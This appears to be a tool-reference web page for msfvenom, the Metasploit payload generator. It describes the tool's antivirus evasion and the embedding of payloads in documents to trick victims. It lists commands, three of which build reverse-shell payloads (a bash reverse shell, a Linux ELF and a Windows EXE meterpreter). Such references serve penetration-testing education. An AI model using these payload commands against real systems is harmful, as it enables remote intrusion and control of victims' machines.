Forrest logo
tool overview
On this page you find all important commands for the CLI tool msfvenom. If the command you are looking for is missing please ask our AI.

msfvenom

Msfvenom is a powerful command-line tool commonly used in penetration testing and exploit development processes. It is a part of the Metasploit Framework, which is an open-source penetration testing platform. Msfvenom allows users to create custom payloads for various platforms, including Windows, Linux, macOS, and Android. Payloads generated by Msfvenom can be used for purposes like remote code execution, privilege escalation, and post-exploitation tasks. It supports various payload types, including reverse and bind shells, meterpreter, shellcodes, and other forms of malicious code. Msfvenom provides a wide range of encoding and obfuscation techniques to evade antivirus software and network security measures. Users can modify payload settings like payload format, architecture, encoding type, and output file type using various command-line options. It also enables users to embed payloads within different file formats, such as executables, PDFs, Word documents, and Excel spreadsheets, to trick unsuspecting victims. Msfvenom integrates seamlessly with the Metasploit Framework, allowing users to easily incorporate generated payloads into Metasploit modules and exploits. With its extensive functionality and flexibility, Msfvenom is a popular choice among security professionals for crafting custom payloads and performing advanced penetration testing activities.

List of commands for msfvenom:

  • msfvenom:tldr:04531 msfvenom: List formats.
    $ msfvenom -l formats
    try on your machine
    explain this command
  • msfvenom:tldr:08cd6 msfvenom: Create a raw bash with a reverse TCP handler.
    $ msfvenom -p cmd/unix/reverse_bash LHOST=${local_ip} LPORT=${local_port} -f raw
    try on your machine
    explain this command
  • msfvenom:tldr:2d48c msfvenom: Show payload options.
    $ msfvenom -p ${payload} --list-options
    try on your machine
    explain this command
  • msfvenom:tldr:6a63d msfvenom: Create an ELF binary with a reverse TCP handler.
    $ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=${local_ip} LPORT=${local_port} -f elf -o ${path-to-binary}
    try on your machine
    explain this command
  • msfvenom:tldr:cdff3 msfvenom: List payloads.
    $ msfvenom -l payloads
    try on your machine
    explain this command
  • msfvenom:tldr:ec896 msfvenom: Create an EXE binary with a reverse TCP handler.
    $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=${local_ip} LPORT=${local_port} -f exe -o ${path-to-binary-exe}
    try on your machine
    explain this command
tool overview